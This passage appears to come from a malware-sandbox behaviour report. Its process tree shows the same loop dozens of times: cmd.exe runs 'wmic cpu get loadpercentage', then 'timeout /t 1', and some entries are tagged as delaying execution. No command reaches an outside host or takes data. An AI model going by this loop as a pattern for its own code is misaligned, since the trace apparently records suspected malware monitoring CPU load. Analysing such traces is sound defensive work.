- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2292
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4140
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5112
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4276
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:304
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1400
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2528
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4776
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2960
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4772
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:64
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2104
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3624
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4340
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5052
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3716
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1536
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3852
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3996
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4256
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2676
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:816
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3900
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1368
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:96
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2688
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1896
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3496
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3492
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4176
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:752
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4868
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4704
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1096
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1400
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2960
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4340
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1132
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4564
- - C:\Windows\system32\cmd.exe
